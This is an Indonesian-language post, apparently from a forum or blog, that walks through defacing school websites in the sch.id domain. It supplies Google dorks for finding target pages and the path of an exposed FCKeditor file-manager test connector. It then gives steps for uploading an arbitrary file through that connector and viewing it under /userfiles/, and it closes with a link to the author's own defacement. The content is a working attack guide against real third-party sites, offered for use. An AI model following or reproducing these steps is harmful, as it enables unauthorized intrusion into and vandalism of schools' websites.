trik ini membahas tentang cara deface web sekolah sch.id, udah pinter deface kan ? ya uda monggo langsung bae kito prakteken samo samo
pertamo siapke dulu perlatanyo !! file .txt dari notepad (isinya terserah nak namo pacar nenek ibuk kaka terserah) nama aq jugo boleh ! hahaha
udah buat file kan ? yauda monggo lanjutt !
buka google dulu ! teros masokin Dork (kata kunci) nih nah aq udh ado dorknyo , tinggal peleh dewek :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
kalo kita ngetik dork itu maka akan muncul banyak n\web sekolah tinggal pilih saja.
contoh : http://www.smaxxx.sch.id/
siap kan exploit dulu , tenang saya sudah punya :
Exploit: /editor/filemanager/connectors/test.html
langsung di hajar, masukke exploitnya tadi ke url web sch.id
contohnyo nah
ex : http://www.smaxxx.sch.id/edit.../test.html
nah, udah muncol kan yang mau di deface !
pada kolom Connector *ASP ubah menjadi *PHP teros kolom Resource Type ubah jadi *FILE
tros klik Browse (cari file .txt yang kamu buat tadi) > Upload
kalo udh berhasil di upload , tinggal buka bae hasilnyo
http://sitetarget.sch.id/userfiles/namafileLo.txt
atau => http://sitetarget.sch.id/userfiles/file/namafileLo.txt
mudah kan Bro ? ini nah hasil depes punyo aq
http://www.smaxxx.sch.id/userfiles/file/defaceby-TKJnesia.txt